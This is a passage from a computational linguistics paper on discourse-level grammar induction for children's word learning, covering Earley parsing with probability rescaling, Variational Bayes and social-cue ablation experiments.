handling very long strings with thou- sands of tokens; and (3) employ Variational Bayes for grammatical inference to obtain better grammars than those given by the EM algorithm. By parsing entire discourses at once, we shed light on a scientifically interesting question about why the child’s own gaze is a positive cue for word learn- ing (Johnson et al., 2012). Our data provide support for the hypothesis (from previous work) that care- givers “follow in”: they name objects that the child is already looking at (Tomasello and Farrar, 1986). In addition, our discourse model produces a perfor- mance improvement in a language acquisition task and yields good discourse segmentations compared with human annotators. 2 Related Work Supervised semantic parsers. Previous work has developed supervised semantic parsers to map sen- tences to meaning representations of various forms, including meaning hierarchies (Lu et al., 2008) and, most dominantly, λ-calculus expressions (Zettle- moyer and Collins, 2005; Zettlemoyer, 2007; Wong and Mooney, 2007; Kwiatkowski et al., 2010). These approaches rely on training data of annotated sentence-meaning pairs, however. Such data are costly to obtain and are quite different from the ex- perience of language learners. Grounded Language Learning. In contrast to se- mantic parsers, grounded language learning systems aim to learn the meanings of words and sentences given an observed world state (Yu and Ballard, 2004; Gorniak and Roy, 2007). A growing body of work in this field employs distinct techniques from a wide variety of perspectives from text-to-record align- ment using structured classification (Barzilay and Lapata, 2005; Snyder and Barzilay, 2007), iterative retraining (Chen et al., 2010), and generative models of segmentation and alignment (Liang et al., 2009) to text-to-interaction mapping using reinforcement learning (Branavan et al., 2009; Vogel and Juraf- sky, 2010), graphical model semantics representa- tion (Tellex et al., 2011a; Tellex et al., 2011b), and Combinatory Categorial Grammar (Artzi and Zettle- moyer, 2013). A number of systems have also used alternative forms of supervision, including sentences paired with responses (Clarke et al., 2010; Gold- wasser and Roth, 2011; Liang et al., 2011) and no supervision (Poon and Domingos, 2009; Gold- wasser et al., 2011). Recent work has also introduced an alternative approach to grounded learning by reducing it to a grammatical inference problem. Börschinger et al. (2011) casted the problem of learning a semantic parser as a PCFG induction task, achieving state-of the art performance in the RoboCup domain. Kim and Mooney (2012) extended the technique to make it tractable for more complex problems. Later, Kim and Mooney (2013) adapted discriminative rerank- ing to the grounded learning problem using a form of weak supervision. We employ this general gram- matical inference approach in the current work. Children Language Acquisition. In the context of language acquisition, Frank et al. (2008) proposed a system that learned words and jointly inferred speakers’ intended referent (utterance topic) using graphical models. Johnson et al. (2012) used gram- matical inference to demonstrate the importance of social cues in children’s early word learning. We ex- tend this body of work by capturing discourse-based dependencies among utterances rather than treating each utterance independently. Discourse Parsing. A substantial literature has ex- amined formal representations of discourse across a wide variety of theoretical perspectives (Mann and Thompson, 1988; Scha and Polanyi, 1988; Hobbs, 1990; Lascarides and Asher, 1993; Knott and Sanders, 1997). Although much of this work was highly influential, Marcu (1997)’s work on dis- course parsing brought this task to special promi- nence. Since then, more and more sophisticated models of discourse analysis have been developed:, e.g., (Marcu, 1999; Soricut and Marcu, 2003; Forbes et al., 2003; Polanyi et al., 2004; Baldridge and Las- carides, 2005; Subba and Di Eugenio, 2009; Her- nault et al., 2010; Lin et al., 2012; Feng and Hirst, 2012). Our contribution to work on this task is to examine latent discourse structure specifically in grounded language learning. 3 A Grounded Learning Task Our focus in this paper is to develop computational models that help us better understand children’s lan- guage acquisition. The goal is to learn both the long term lexicon of mappings between words and objects (language learning) as well as the intended topic of individual utterances (language comprehen- sion). We consider a corpus of child-directed speech annotated with social cues, described in (Frank et al., 2013). There are a total of 4,763 utterances in the corpus, each of which is orthographically- transcribed from videos of caregivers playing with pre-linguistic children of various ages (6, 12, and 18 months) during home visits.1 Each utterance was hand-annotated with objects present in the (non-linguistic) context, e.g. dog and pig (Fig- ure 1), together with sets of social cues, one set per object. The social cues describe objects the care-giver is looking at (mom.eyes), holding onto (mom.hands), or pointing to (mom.point); sim- ilarly, for (child.eyes) and (child.hands). 3.1 Sentence-level Models Motivated by the importance of social information in children’s early language acquisition (Carpenter et al., 1998), Johnson et al. (2012) proposed a joint model of non-linguistic information including the physical context and social cues, and the linguis- tic content of individual utterances. They framed the joint inference problem of inferring word-object mappings and inferring sentence topics as a gram- mar induction task where input strings are utterances prefixed with non-linguistic information. Objects present in the non-linguistic context of an utterance are considered its potential topics. There is also a special null topic, None, to indicate non-topical ut- terances. The goal of the model is then to select the most probable topic for each utterance. Top-level rules, Sentence → Topict Wordst (unigram PCFG) or Sentence → Topict Collocst (collocation Adaptor Grammar), are tai- lored to link the two modalities (t ranges over T ′, the set of all available topics (T ) and None). These rules enforce sharing of topics between prefixes (Topict) and words (Wordst or Collocst). Each word in the utterance is drawn from either a topic- specific distribution Wordt or a general “null” dis- tribution WordNone. As illustrated in Figure 1, the selected topic, pig, is propagated down to the input string through two paths: (a) through topical nodes until an object is 1Caregivers were given pairs of toys to play with, e.g. a stuffed dog and pig, or a wooden car and truck. reached, in this case the .pig object, and (b) through lexical nodes to topical word tokens, e.g. piggie. So- cial cues are then generated by a series of binary decisions as detailed in Johnson et al. (2012). The key feature of these grammars is that parameter in- ference corresponds both to learning word-topic re- lations and learning the salience of social cues in grounded learning. In the current work, we restrict our attention to only the unigram PCFG model to focus on investi- gating the role of topic continuity. Unlike the ap- proach of Johnson et al. (2012), which uses Markov Chain Monte Carlo techniques to perform gram- matical inference, we experiment with Variational Bayes methods, detailed in Section 6. 3.2 A Discourse-level Model Topic continuity—the tendency to group utterances into coherent discourses about a single topic—may be an important source of information for children learning the meanings of words (Frank et al., 2013). To address this issue, we consider a new discourse- level model of grounded language that captures de- pendencies between utterances. By linking multiple utterances in a single parse, our proposed grammati- cal formalism is a bigram Markov process that mod- els transitions among utterance topics. Our grammar starts with a root symbol Discourse, which then selects a starting topic through a set of discourse initial rules, Discourse → Discourset for t ∈ T ′. Each of the Discourset nodes generates an utter- ance of the same topic, and advances into other topics through transition rules, Discourset → Sentencet Discourset′ for t′ ∈ T ′. Dis- courses terminate by ending rules, Discourset → Sentencet. Other rules in the unigram PCFG model by Johnson are reused except for the top- level rules in which we replace the non-terminal Sentence by topic-specific ones Sentencet. 3.3 Parsing Discourses and Challenges Using a discourse-level grammar, we must parse a concatenation of all the utterances (with annota- tions) in each conversation. This concatenation re- sults in an extremely long string: in the social-cue corpus (Frank et al., 2013), the average length of these per-recording concatenations is 2152 tokens (σ=972). Parsing such strings poses many chal- lenges for existing algorithms. For familiar algorithms such as CYK, runtime quickly becomes enormous: the time complexity of CYK is O(n3) for an input of length n. Fortunately, we can take advantage of a special structural prop- erty of our grammars. The shape of the parse tree is completely determined by the input string; the only variation is in the topic annotations in the nonter- minal labels. So even though the number of possi- ble parses grows exponentially with input length n, the number of possible constituents grows only lin- early with input length, and the possible constituents can be identified from the left context.2 These con- straints ensure that the Earley algorithm3 (Earley, 1970) will parse an input of length n with this gram- mar in time O(n). A second challenge in parsing very long strings is that the probability of a parse is the product of the probabilities of the rules involved in its derivation. As the length of a derivation grows linearly with the length of the input, the parse probabilities decrease exponentially as a function of sentence length, caus- ing floating-point underflow on inputs of even mod- erate length. The standard method for handling this is to compute log probabilities (which decrease lin- early as a function of input length, rather than ex- ponentially), but as we explain later (Section 5), we can use the ability of the Earley algorithm to com- pute prefix probabilities (Stolcke, 1995) to rescale the probability of the parse incrementally and avoid floating-point underflows. In the next section, we provide background in- formation on the Earley algorithm for PCFGs, the prefix probability scheme we use, and the inside- outside algorithm in the Earley context. 4 Background 4.1 Earley Algorithm for PCFGs The Earley algorithm was developed by Earley (1970) and known to be efficient for certain kinds of CFGs (Aho and Ullman, 1972). An Earley parser 2The prefix markers # and ## and the topic markers such as “.dog” enable a left-to- right parser to unambiguously iden- tify its location in the input string. 3In order to achieve linear time the parsing chart must have suitable indexing; see Aho and Ullman (1972), Leo (1991) and Aycock and Horspool (2002) for details. constructs left-most derivations of strings, using dot- ted productions to keep track of partial derivations. Specifically, each state in an Earley parser is rep- resented as [l,r]: X→α . β to indicate that input symbols xl, . . . ,xr−1 have been processed and the parser is expecting to expand β. States are gen- erated on the fly using three transition operations: predict (add states to charts), scan (shift dots across terminals), and complete (merge two states). Fig- ure 2 shows an example of a completion step which also illustrates the implicit binarization automati- cally done in Earley algorithm. � � � � � � � � � � � � � � �� Figure 2: Completion step – merging two states [l,m]: X→α . Y β and [m,r]:Y →ν . to produce a new state [l,r]: X→αY . β. In order to handle PCFGs, Stolcke (1995) extends the Earley parsing algorithm to introduce the no- tion of an Earley path being a sequence of states linked by Earley operations. By establishing a one- to-one mapping between partial derivations and Ear- ley paths, Stolcke could then assign each path a derivation probability, that is the product of the all rule probabilities used in the predicted states of that path. Here, each production X→ν corresponds to a predicted state [l, l] : X→. ν. Besides parsing, being able to compute string and prefix probabilities by summing derivation probabil- ities is also of great importance. To compute these sums efficiently, each Earley state is attached with a forward and an inner probability which are updated incrementally as new states are spawned by the three transition operations. 4.2 Forward and Prefix Probabilities Intuitively, the forward probability of a state [l,r]: X→α . β is the probability of an Earley path through that state, generating input up to position r-1. This probability generalizes a similar concept in HMM and lends itself to the computation of pre- fix probabilities, sums of forward probabilities over scanned states yielding a prefix x. Computing prefix probabilities is important be- cause it enables probabilistic prediction of pos- sible follow-words xi+1 as P(xi+1|x0 . . .xi) = P(x0...xixi+1) P(x0...xi) (Jelinek and Lafferty, 1991). These conditional probabilities allow estimation of the in- cremental costs of a stack decoder (Bahl et al., 1983). In (Huang and Sagae, 2010), a conceptu- ally similar prefix cost is defined to order states in a beam search decoder. Moreover, the negative log- arithm of such conditional probabilities are termed as surprisal values in the psycholinguistics literature (e.g., Hale, 2001; Levy, 2008), to describe how dif- ficult a word is in a given context. Interestingly, we show that prefix probabilities lead us to construct a parser that could parse extremely long strings next. 4.3 Inside Outside Algorithm To extend the Inside Outside (IO) algorithm (Baker, 1979) to the Earley context, Stolcke introduced in- ner and outer probabilities which generalize the in- side and outside probabilities in the IO algorithm. Specifically, the inner probability of a state [l,r]: X→α . β is the probability of generating an input substring xl, . . . ,xr−1 from a non-terminal X using a production X→α β.4 � � � � � � � � � � � � � � �� Figure 3: Inner and outer probabilities. The outer probability of X→α . Y β is a sum of all products of its parent outer probability (X→αY . β) and its sibling inner probability (Y →ν .). Similarly, the outer proba- bility of Y →ν . is derived from the outer probability of X→αY . β and the inner probability of X→α . Y β. Once all inner probabilities have been populated in a forward pass, outer probabilities are derived backward, starting from the outer probability of the goal state [0,n] :→ S . being 1. Here, each Earley state is associated with an outer probability which complements the inner probability by referring pre- cisely to those parts (not covered by the correspond- ing inner probability) of the complete paths generat- ing the input string x. The implicit binarization in 4Summing up inner probabilities of all states Y →ν . exactly yields Baker’s inside probability for Y . Earley parsing allows outer probabilities to be accu- mulated in a similar way as its counterpart in the IO algorithm (see Figure 3). These quantities allow for efficient grammatical inference in which the expected count of each rule X→λ given a string x is computed as: c(X→λ|x) = ∑ s:[l,r]X→.λ outer(s) · inner(s) P(S ⇒∗ x) . (1) 5 A Rescaling Approach for Parsing Our parser originated from the prefix probability parser by Levy (2008), but has diverged markedly since then. The parser, called Earleyx5, is ca- pable of producing Viterbi parses and performing grammatical induction based on the expectation- maximization and variational Bayes algorithms. To tackle the underflow problem posed when parsing discourses (§3.3), we borrow the rescal- ing concept from HMMs (Rabiner, 1990) to extend the probabilistic Earley algorithm. Specifically, the probability of each Earley path is scaled by a con- stant ci each time it passes through a scanned state generating the input symbol xi. In fact, each path passes through each scanned state exactly once, so we consistently accumulate scaling factors for the forward and inner probabilities of a state [l,r] : X→α . β as c0 . . .cr−1 and cl . . .cr−1 respectively. Arguably, the most intuitive choice of the scal- ing factors are the prefix probabilities, which essen- tially resets the probability of any Earley path start- ing from any position i to 1. Concretely, we set c0 = 1 P(x0) and ci = P(x0...xi−1) P(x0...xi) for i=1, . . . ,n- 1 where n is the input length. As noted in section §4.2, the logarithm of ci gives us the surprisal value for the input symbol xi. Rescaling factors are only introduced in the for- ward pass, during which the outer probability of a state [l,r]: X→α . β has already been scaled by fac- tors c0 . . .cl−1cr . . .cn−1.6 More importantly, when 5Parser code is available at http://nlp.stanford. edu/˜lmthang/earleyx. 6The outer probability of a state is essentially the product of inner probabilities covering all input symbols outside the span of that state. For grammars containing cyclic unit productions, we also need to multiply with terms from the unit-production relation matrix (Stolcke, 1995). computing expected counts, scaling factors in the outer and inner terms cancel out with those in the string probability in Eq. (1), implying that rule prob- ability estimation is unaffected by rescaling. 5.1 Parsing Time on Dense Grammars We compare in Table 1 the parsing time (on a 2.4GHz Xeon CPU) of our parser (Earleyx) and Levy’s. The task is to compute surprisal values for a 22-word sentence over a dense grammar.7 Given that our parser is now capable of performing scaling to avoid underflow, we avoid converting probabili- ties to logarithmic form, which yields a speedup of about 4 times compared to Levy’s parser. Parser Time (s) (Levy, 2008) 640 Earleyx + scaling 145 Table 1: Parsing time (dense grammars) – to compute surprisal values for a 22-word sentence using Levy’s parser and ours (Earleyx). 5.2 Parsing Time on Sparse Grammars 200 400 600 800 1000 1200 1400 1600 1800 2000 1 2 3 4 5 6 7 Parsing Time on Sparse Grammars # Words se co n d s Figure 4: Parsing time (sparse grammars) – to compute Viterbi parses for sentences of increasing lengths. Figure 4 shows the time taken (as a function of the input length) for Earleyx to compute a Viterbi parses over our sparse grammars (§3.2). The plot confirmed our analysis in that the special structure of our grammars yields approximately linear parsing time in the input length (see §3.3). 7MLE estimated from the English Penn Treebank. 6 Grammar Induction We employ a Variational Bayes (VB) approach to perform grammatical inference instead of the stan- dard Inside Outside (IO) algorithm, or equivalently the Expectation Maximization (EM) algorithm, for several reasons: (1) it has been shown to be less likely to cause over-fitting for PCFGs than EM (Kurihara and Sato, 2004) and (2) implementation- wise, VB is a straightforward extension from EM as they both share the same process of computing the expected counts (the IO part) and only differ at how rule probabilities are reestimated. At the same time, VB has also been demonstrated to do well on large datasets and is competitive with Gibbs samplers while having the fastest convergence time among these estimators (Gao and Johnson, 2008). The rule reestimation in VB is carried as fol- lows. Let αr be the prior hyperparameter of a rule r in the rule set R and cr be its expected count accumulated over the entire corpus after an IO iteration. The posterior hyperparameter for r is α∗r = αr + cr. Let ψ be the digamma function, the rule parameter update formula is: θr:X→λ = exp [ ψ (α∗r) − ψ (∑ r′:X→λ′ α ∗ r′ )] . Whereas IO minimizes the negative log- likelihood of the observed data (sentences), -log p(x), VB minimizes a quantity called free energy, which we will use later to monitor con- vergence. Here x denotes the observed data and θ represents the model parameters (PCFG rule probabilities). Following (Kurihara and Sato, 2006), we compute the free energy as: F(x,θ) = − log p(x) + ∑ X∈N log Γ ( ∑ r:X→λ α ∗ r) Γ ( ∑ r:X→λ αr) − ∑ r∈R ( log Γ (α∗r) Γ (αr) + cr log θr ) where Γ denotes the gamma function. 6.1 Sparse Dirichlet Priors In our application, since each topic should only be associated with a few words rather than the entire vocabulary, we impose sparse Dirichlet priors over the Wordt distributions by setting a symmetric prior α<1 for all rules Wordt→w (∀t ∈ T,w ∈ W), where W is the set of all words in the corpus. This biases the model to select only a few rules per non- terminal Wordt.8 For all other rules, a uniform hy- perparameter value of 1 is used. We initialized rule probabilities with uniform distributions plus random noise. It is worthwhile to mention that sparse Dirich- let priors were proposed in Johnson (2010)’s work that learns Latent Dirchlet Allocation topic models using Bayesian inference for PCFGs. 7 Experiments Our experiments apply sentence- and discourse- level models to the annotated corpus of child- directed speech described in Section 3. Each model is evaluated on (a) topic accuracy—how many utter- ances are labeled with correct topics (including the null), (b) topic metrics (f-scores/precision/recall)— how well the model predicts non-null topical utter- ances, (c) word metrics—how well the model pre- dicts topical words,9 and (d) lexicon metrics—how well word types are assigned to the topic that they attach to most frequently. For example, in Figure 1, the model assigns topic pig to the entire utterance. At the word level, it labels piggie with topic pig and assigns null topic to wheres and the. See (Johnson et al., 2012) for more details of these metrics. In Section 7.1, we examine baseline models that do not make use of social cues (mother and child’s eye-gaze and hand position) to discover the topic; these baselines are contrasted with a range of social cues (§7.2 and §7.3). In Section 7.4, we evaluate the discourse structures discovered by our models. 7.1 Baseline Models (No Social Cues) To create baselines for later experiments, we eval- uate our models without social information. We compare sentence-level models using three different inference procedures—Markov Chain Monte Carlo (MCMC) (Johnson et al., 2012), Expectation Max- imization (EM), and Variational Bayes (VB)10—as well as the discourse-level model described above. 8It is important to not sparsify the WordNone distribution since WordNone could expand into many non-topical words. 9Topics assigned by the model are compared with those given by the gold dictionary provided by (Johnson et al., 2012). 10To determine the best sparsity hyperparameter α for lexical rules (§6.1), we performed a line search over {1,0.1, 0.01, 0.001, 0.0001}. As α decreases, performance im- proves, peaking at 0.001, the value used for all reported results Model Topic Word Lexicon Energy Acc. F1 P R F1 P R F1 P R MCMC 49.07 60.64 48.67 80.43 29.50 17.63 90.31 14.83 8.10 88.10 VB 53.14 60.89 50.53 76.59 25.62 14.94 89.91 16.71 9.25 85.71 156719 discourse 51.02 59.40 48.60 76.35 23.86 13.82 87.33 15.05 8.27 83.33 150023 discourse+init 55.78 60.91 52.15 73.22 29.75 17.91 87.65 21.11 11.95 90.48 149458 Table 2: Social-cue models. Comparison of sentence- and discourse-level models (init: initialized from the VB sentence-level model) over full metrics. Free energies are shown to compare VB-based models. Model Acc. Topic F1 Word F1 Lexicon F1 MCMC 33.95 40.44 20.07 10.37 EM 32.08 39.76 13.31 6.09 VB 39.64 39.22 17.40 12.27 discourse 40.63 42.01 19.31 12.72 Table 3: Baseline (non-social) models. Comparison of sentence-level models (MCMC (Johnson et al., 2012), EM, VB) and the discourse-level model. Results in Table 3 suggest that incorporating topic continuity through the discourse model boosts performance compared to sentence-level models. Within sentence-level models, EM is inferior to both MCMC and VB (in accordance with the consensus that EM is likely to overfit for PCFGs). Comparing VB and MCMC, VB is significantly better at topic accuracy but is worse at topic F1. This result sug- gests that VB predicts that more utterances are non- topical compared with MCMC, perhaps explaining why MCMC has the highest word F1. Nevertheless, unlike VB, the discourse model outperforms MCMC in all topic metrics, indicating that topic continuity helps in predicting both null and topical utterances. The discourse model is also capable of captur- ing topical transitions. Examining one instance of a learned grammar reveals that the distribution un- der Discourset is often dominated by a few major transitions. For example, car tends to have transi- tions into car (0.72) and truck (0.19); while pig prefers to transit into pig (0.69) and dog (0.24). These learned transitions nicely recover the struc- ture of the task that caregivers were given: to play with toy pairs like car/truck and pig/dog. 7.2 Social-cue Models We next explore how topic continuity interacts with social information via a set of simulations mirroring those in the previous section. Results are shown in Table 2. For the sentence-level models using social cues, VB now outperforms MCMC in topic accuracy and F1, as well as lexicon evaluations, suggesting that VB is overall quite competitive with MCMC.11 Turning to the discourse models, social informa- tion and topic continuity both independently boost learning performance (as evidenced in Johnson et al. (2012) and in Section 7.1). Nevertheless, joint infer- ence using both information sources (discourse row) resulted in a performance decrement. Rather than reflecting issues in the model itself, perhaps the in- creased complexity of the inference problem might have led to this performance decrement. To test this explanation, we initialized our discourse-level model with the VB sentence-level model. Results are shown in the discourse+init row. With a sentence-level initialization, perfor- mance improved substantially, yielding the best re- sults over most metrics. In addition, the discourse model with sentence-level initialization achieved lower free energy than the standard initialization dis- course model. Both of these results support the hy- pothesis that initialization facilitated inference in the more complex discourse model. From a cognitive science perspective, this sort of result may point to the utility of beginning the task of discourse segmen- tation with some initial sentence-level expectations. 7.3 Effects of Individual Social Cues The importance of particular social cues and their relationship to discourse continuity is an additional topic of interest from the cognitive science per- spective (Frank et al., 2013). Returning to one of the questions that motivated this work, we can use 11Detailed breakdown of word f-scores reveals that MCMC is much better at precision, indicating that VB predicts more words as topical than MCMC. An explanation for such effect is that we use the same α for all lexical rules, which results in suboptimal sparsity levels for Wordt distributions. For MCMC, Johnson et al. (2012) used the adaptor grammar software to learn the hyperparameters automatically from data. all no.child.eyes no.child.hands no.mom.eyes no.mom.hands no.mom.point MCMC 49.1/60.6/29.5/14.8 38.4/46.6/21.5/11.1 49.1/60.6/29.6/15.3 48.0/59.7/29.0/15.5 48.7/60.0/29.3/15.6 48.8/60.3/29.3/15.6 VB 53.1/60.9/25.62/16.71 49.3/56.0/22.6/15.1 52.9/60.4/26.2/16.2 51.5/59.1/24.6/16.3 51.9/59.2/25.3/16.3 52.9/60.6/25.5/16.6 discourse+init 55.8/60.9/29.8/21.1 53.7/59.2/27.8/19.7∗+ 55.2/60.7/29.0/21.4+ 54.7/60.0/29.0/21.6 55.2/60.1/29.1/21.4 55.6/60.8/29.5/21.7 Table 4: Social cue influence. Ablation test results across models without discourse (MCMC, VB) and with discourse (discourse+init). We start with the full set of social cues and drop one at a time. Each cell contains results for metrics: topic accuracy/topic F1/word F1/lexicon F1. For row discourse+init, we compare models with/without a social cue using chi-square tests and denote statistically significant results (p < .05) at the utterance (∗) and word (+) levels. none child.eyes child.hands mom.eyes mom.hands mom.point MCMC 34.0/40.4/20.1/10.4 45.7/57.3/28.9/13.6 34.0/40.1/20.1/9.7 33.8/40.2/19.9/9.7 35.6/42.8/19.8/10.0 30.6/35.5/18.1/9.2 VB 39.6/39.2/17.4/12.27 47.2/53.0/21.9/13.9 43.0/45.8/15.4/12.9 42.9/46.5/14.6/12.4 41.1/43.8/17.1/12.4 39.7/39.7/17.5/13.4 discourse 40.7/41.8/19.2/12.1 47.8/55.4/22.8/14.2∗+ 44.6/50.8/20.3/13.1∗+ 44.7/50.1/21.7/14.3∗+ 42.7/46.4/19.0/11.6+ 38.7/40.2/16.6/11.9∗+ Table 5: Social cue influence. Add-one test results across models without discourse (MCMC, VB) and with discourse (discourse). We start with no social information and add one cue at a time. Each cell contains results for metrics: topic accuracy/topic F1/word F1/lexicon F1. For row discourse, we compare models with/without a social cue using chi-square tests and denote statistically significant results (p < .05) at the utterance (∗) and word (+) levels. our discourse model to answer the question about the role that the child.eyes cue plays in child- directed discourses. Johnson et al. (2012) raised two hypotheses that could explain the importance of child.eyes as a social cue: (1) caregivers “fol- low in” on the child’s gaze: they tend to talk about what the child is looking at (Baldwin, 1993), or (2) the child.eyes cue encodes the topic of the pre- vious sentence, inadvertently giving a non-discourse model access to rudimentary discourse information. To address this question, we conduct two tests: (1) ablation – eliminating each social cue in turn (e.g. child.eyes), and (2) add-one, using a sin- gle social cue per turn. Table 4 and 5 show corre- sponding results for models without discourse (the MCMC and VB sentence-level models) and with discourse (discourse+init for the ablation test and discourse for the add-one test). We observe simi- lar trends to Johnson et al. (2012): the childs gaze is the most important cue. Removing it from the full model with all social cues or adding it to the base model with no cues both result in the largest perfor- mance change; in both cases this change is statisti- cally reliable.12 The large performance differences for child.eyes are consistent with the hypothe- sis that caregivers are following in, or discussing the object that children are interested in – even control- 12It is somewhat surprising when child.eye has much less influence on VB than on MCMC in the ablation test. Though re- sults in the add-one test reveal that VB generalizes much better than MCMC when presented with a single social cue, it remains interesting to find out internally what causes the difference. ling for the continuity of discourse, a confound in previous analyses. In other words, the importance of child.eyes in the discourse model suggests that this cue encodes useful information in addition to the intersentential discourse topic. 7.4 Discourse Structure Evaluation While the discourse model performs well using met- rics from previous work, these metrics do not fully reflect an important strength of the model: its abil- ity to capture inter-utterance structure. For exam- Raw Discourse Utterance car car come here lets find the car car there car car is that a car car car the car goes vroom vroom vroom Table 6: Topic annotation examples. raw (previous metrics) and discourse (new metrics). ple, consider the sequence of utterances in Table 6. Our previous evaluation is based on the raw annota- tion, which labels as topical only utterances contain- ing topical words or pronouns referring to an object. As a result, classifying “there” as car is incorrect. From the perspective of a human listener, however, “there” is part of a broader discourse about the car, and labeling it with the same topic captures the fact that it encodes useful information for learners. To differentiate these cases, Frank and Rohde (under re- view) added a new set of annotations (to the dataset used in Section 7) based on the discourse structure perceived by human, similar to column discourse, . We utilize these new annotations to judge topics predicted by our discourse model and adopt previ- ous metrics for discourse segmentation evaluation: a=b, a simple proportion equivalence of discourse assignments; pk, a window method (Beeferman et al., 1999) to measure the probability of two random utterances correctly classified as being in the same discourse; and WindowDiff (Pevzner and Hearst, 2002), an improved version of pk which gives “par- tial credit” to boundaries close to the correct ones. Results in Table 7 demonstrate that our model is in better agreement with human annotation (model- human) than the raw annotation (raw-human) across all metrics. As is visible from the limited change in the a=b metric, relatively few topic assignments are altered; yet these alterations create much more coherent discourses that allow for far better segmen- tation performance under pk and WindowDiff. raw-human model-human a=b 63.6 69.3 pk 57.0 83.6 WindowDiff 36.2 61.2 Table 7: Discourse evaluation. Single annotator sample, comparison between topics assigned by the raw annota- tion, our discourse model, and a human coder. To put an upper bound on possible discourse seg- mentation results, we further evaluated performance on a subset of 634 utterances for which multiple an- notations were collected. Results in Table 8 demon- strate that our model predicts discourse topics (m-h1, m-h1) at a level quite close to the level of agreement between human annotators (column h1-h2). r-h1 r-h2 m-h1 m-h2 h1-h2 a=b 60.1 65.6 70.4 72.4 81.7 pk 50.7 51.8 85.1 84.9 89.7 WindowDiff 29.0 30.1 60.1 66.9 72.7 Table 8: Discourse evaluation. Multiple annotator sam- ple, comparison between raw annotations (r), our model (m), and two independent human coders (h1, h2). 8 Conclusion and Future Work In this paper, we proposed a novel integration of existing techniques in parsing and grammar induc- tion to offer a complete solution for simultaneously modeling grounded language at the sentence and discourse levels. Specifically, we used the Ear- ley algorithm to exploit the special structure of our grammars to achieve approximately linear parsing time, introduced a rescaling approach to handle very long input strings, and utilized Variational Bayes for grammar induction to obtain better solutions than the Expectation Maximization algorithm. By transforming a grounded language learning problem into a grammatical inference task, we used our parser to study how discourse structure could facilitate children’s language acquisition. In ad- dition, we investigate the interaction between dis- course structure and social cues, both important and complementary sources of information in lan- guage learning (Baldwin, 1993; Frank et al., 2013). We also examined why individual children’s gaze was an important predictor of reference in previ- ous work (Johnson et al., 2012). Using ablation tests, we showed that information provided by the child’s gaze is still valuable even in the presence of discourse continuity, supporting the hypothesis that parents “follow in” on the particular focus of chil- dren’s attention (Tomasello and Farrar, 1986). Lastly, we showed that our models can produce accurate discourse segmentations. Our system’s out- put is considerably better than the raw topic anno- tations provided in the previous social cue corpus (Frank et al., 2013) and is in good agreement with discourse topics assigned by human annotators in Frank and Rohde (under review). In conclusion, although previous work on grounded language learning has treated individual utterances as independent entities, we have shown that the ability to incorporate discourse information can be quite useful for such problems. Discourse continuity is an important source of information in children language acquisition and may be a valuable part of future grounded language learning systems. Acknowledgements We thank the TACL action editor, Mark Steed- man, and the anonymous reviewers for their valu- able feedback, as well as Chris Manning for helpful discussions. This research was supported under the Australian Research Council’s Discovery Projects funding scheme (project numbers DP110102506 and DP110102593). References Alfred V. Aho and Jeffery D. Ullman. 1972. The The- ory of Parsing, Translation and Compiling; Volume 1: Parsing. Prentice-Hall, Englewood Cliffs, New Jersey. Yoav Artzi and Luke S. Zettlemoyer. 2013. Weakly su- pervised learning of semantic parsers for mapping in- structions to actions. Transactions of the Association for Computational Linguistics, 1:49–62. John Aycock and R. Nigel Horspool. 2002. Practical ear- ley parsing. The Computer Journal, 45(6):620–630. Lalit R. Bahl, Frederick Jelinek, and Robert L. Mercer. 1983. A maximum likelihood approach to continu- ous speech recognition. IEEE Transactions on Pattern Analysis and Machine Intelligence, 5(2):179 –190. James K. Baker. 1979. Trainable grammars for speech recognition. The Journal of the Acoustical Society of America, 65(S1):S132. Jason Baldridge and Alex Lascarides. 2005. Proba- bilistic head-driven parsing for discourse structure. In CONLL. Dare A. Baldwin. 1993. Infants’ ability to consult the speaker for clues to word reference. Journal of Child Language, 20:395–418. Regina Barzilay and Mirella Lapata. 2005. Collective content selection for concept-to-text generation. In HLT-EMNLP. Doug Beeferman, Adam Berger, and John Lafferty. 1999. Statistical models for text segmentation. Ma- chine Learning, 34(1-3):177–210. Benjamin Börschinger, Bevan K. Jones, and Mark John- son. 2011. Reducing grounded learning tasks to gram- matical inference. In EMNLP. S. R. K. Branavan, Harr Chen, Luke S. Zettlemoyer, and Regina Barzilay. 2009. Reinforcement learning for mapping instructions to actions. In ACL-IJCNLP. Malinda Carpenter, Katherine Nagell, Michael Tomasello, George Butterworth, and Chris Moore. 1998. Social cognition, joint attention, and com- municative competence from 9 to 15 months of age. Monographs of the society for research in child development, 63(4). David L. Chen and Raymond J. Mooney. 2008. Learning to sportscast: A test of grounded language acquisition. In ICML. David L. Chen, Joohyun Kim, and Raymond J. Mooney. 2010. Training a multilingual sportscaster: Using per- ceptual context to learn language. Journal of Artificial Intelligence Research, 37:397–435. James Clarke, Dan Goldwasser, Ming-Wei Chang, and Dan Roth. 2010. Driving semantic parsing from the world’s response. In CoNLL. Jay Earley. 1970. An efficient context-free parsing algo- rithm. Communications of the ACM, 13(2):94–102. Vanessa Wei Feng and Graeme Hirst. 2012. Text-level discourse parsing with rich linguistic features. In ACL. Katherine Forbes, Eleni Miltsakaki, Rashmi Prasad, Anoop Sarkar, Joshi Aravind, and Bonnie Webber. 2003. D-ltag system: Discourse parsing with a lexical- ized tree adjoining grammar. Journal of Logic, Lan- guage and Information, 12:261–279. Michael C. Frank and Hannah Rohde. under review. Markers of topical discourse in child-directed speech. Michael C. Frank, Noah D. Goodman, and Josh B. Tenen- baum. 2008. A Bayesian framework for cross- situational word-learning. Advances in Neural Infor- mation Processing Systems 20. Michael C. Frank, Joshua B. Tenenbaum, and Anne Fernald. 2013. Social and discourse contributions to the determination of reference in cross-situational word learning. Language Learning and Development, 9(1):1–24. Jianfeng Gao and Mark Johnson. 2008. A comparison of Bayesian estimators for unsupervised Hidden Markov Model POS taggers. In EMNLP. Dan Goldwasser and Dan Roth. 2011. Learning from natural instructions. In IJCAI. Dan Goldwasser, Roi Reichart, James Clarke, and Dan Roth. 2011. Confidence driven unsupervised semantic parsing. In ACL. Peter Gorniak and Deb Roy. 2007. Situated language understanding as filtering perceived affordances. Cog- nitive Science, 31(2):197–231. Hugo Hernault, Helmut Prendinger, David A. duVerle, and Mitsuru Ishizuk. 2010. HILDA: A discourse parser using support vector machine classification. Di- alogue and Discourse, 1(3):1–33. Jerry R. Hobbs. 1990. Literature and Cognition. CSLI Lecture Notes 21. Liang Huang and Kenji Sagae. 2010. Dynamic program- ming for linear-time incremental parsing. In ACL. Frederick Jelinek and John D. Lafferty. 1991. Compu- tation of the probability of initial substring generation by stochastic context-free grammars. Computational Linguistics, 